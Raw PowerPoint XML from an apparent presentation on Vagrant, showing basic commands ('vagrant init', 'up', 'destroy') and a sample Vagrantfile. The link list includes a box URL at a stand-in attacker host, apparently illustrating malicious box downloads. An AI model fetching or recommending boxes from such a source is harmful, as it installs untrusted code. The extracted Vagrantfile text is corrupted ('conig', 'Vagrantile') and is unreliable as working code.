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1" r:id="rId28"/>
    <p:sldId id="292" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="294" r:id="rId31"/>
    <p:sldId id="296" r:id="rId32"/>
    <p:sldId id="297" r:id="rId33"/>
    <p:sldId id="298" r:id="rId34"/>
    <p:sldId id="299" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="304" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="306" r:id="rId40"/>
    <p:sldId id="307" r:id="rId41"/>
    <p:sldId id="308" r:id="rId42"/>
    <p:sldId id="310" r:id="rId43"/>
    <p:sldId id="311" r:id="rId44"/>
    <p:sldId id="313" r:id="rId45"/>
    <p:sldId id="314" r:id="rId46"/>
    <p:sldId id="315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3" r:id="rId63"/>
    <p:sldId id="334" r:id="rId64"/>
    <p:sldId id="336" r:id="rId65"/>
    <p:sldId id="337" r:id="rId66"/>
    <p:sldId id="339" r:id="rId67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50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7417" y="190436"/>
            <a:ext cx="4255264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4827" y="1090943"/>
            <a:ext cx="1520444" cy="862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795" y="779800"/>
            <a:ext cx="4334509" cy="202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slide" Target="slide35.xml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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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2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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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2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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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2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url.haxx.se/docs/sslcerts.html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agrantcloud.com/debian/jessie6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ttacker.com/debian/jessie64/virtualbox.box" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vagrantcloud.com/debian/jessie64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slide" Target="slide54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png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slide" Target="slide54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vagrant@127.0.0.1s" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xm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vagrant@127.0.0.1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:root@127.0.0.1s" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:root@127.0.0.1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mitchellh/vagrant/tree/master/keys" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vagrant@127.0.0.1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slide" Target="slide51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58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slide" Target="slide56.xml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slide" Target="slide46.xml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58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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manual/ch13.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46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" y="0"/>
            <a:ext cx="4608195" cy="3456304"/>
            <a:chOff x="20" y="0"/>
            <a:chExt cx="4608195" cy="3456304"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20" y="0"/>
              <a:ext cx="4607920" cy="34560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1277" y="1348460"/>
              <a:ext cx="1704339" cy="916305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704339" h="916305">
                  <a:moveTo>
                    <a:pt x="1704009" y="360006"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1560004" y="360006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560004" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="360006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="916076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560004" y="916076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704009" y="916076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704009" y="360006"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E20074">
                <a:alpha val="6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809" y="1530983"/>
              <a:ext cx="1375410" cy="731520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1375410" h="731519">
                  <a:moveTo>
                    <a:pt x="1374940" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="731014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374940" y="731014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374940" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E20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1087" y="1617916"/>
            <a:ext cx="104140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275"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>VAGRANT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1315"/>
              </a:lnSpc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Up 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Running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589" y="190436"/>
            <a:ext cx="3002915" cy="1587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sz="1200" spc="-204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1200" spc="-125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EXAMPLE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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overview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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="110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ubuntu/trusty64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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> up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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>www-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="6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http://localhost:8080/index.html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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> destroy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5" dirty="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr spc="-5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589" y="190436"/>
            <a:ext cx="961390" cy="1071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sz="1200" spc="-250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1200" spc="-125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EXAMPLE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110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>tree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289" y="1374089"/>
            <a:ext cx="1877567" cy="12029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5" dirty="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr spc="-5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21355" y="1638680"/>
            <a:ext cx="284480" cy="389255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="185674" y="92837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178378" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="185674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178378" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185674" y="92837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="284226" y="296291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276930" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="203454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98552" y="296291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="389128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276930" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284226" y="296291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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36019" y="2042956"/>
            <a:ext cx="193732" cy="193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8589" y="190436"/>
            <a:ext cx="3931920" cy="2206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F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F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sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>EXAMPLE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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile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12700" marR="1866264">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrantile  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrant.conigure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>|conig|</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10477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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”ubuntu/trusty64”</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.synced_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”v-root”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”/vagrant” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775" marR="5080">
              <a:lnSpc>
                <a:spcPct val="121300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.provision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:shell, path: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”bootstrap.sh” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:forwarded_port, guest: 80, host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>3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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>end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546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>18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122" y="190436"/>
            <a:ext cx="9036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>
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/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221355" y="1638680"/>
            <a:ext cx="284480" cy="389255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="185674" y="92837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178378" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="185674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178378" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185674" y="92837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="284226" y="296291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276930" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="203454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98552" y="296291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="389128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276930" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284226" y="296291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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36019" y="2042956"/>
            <a:ext cx="193732" cy="193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299" y="2463808"/>
            <a:ext cx="188958" cy="1889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8589" y="699201"/>
            <a:ext cx="3931920" cy="194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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1866264">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrantile  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrant.conigure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
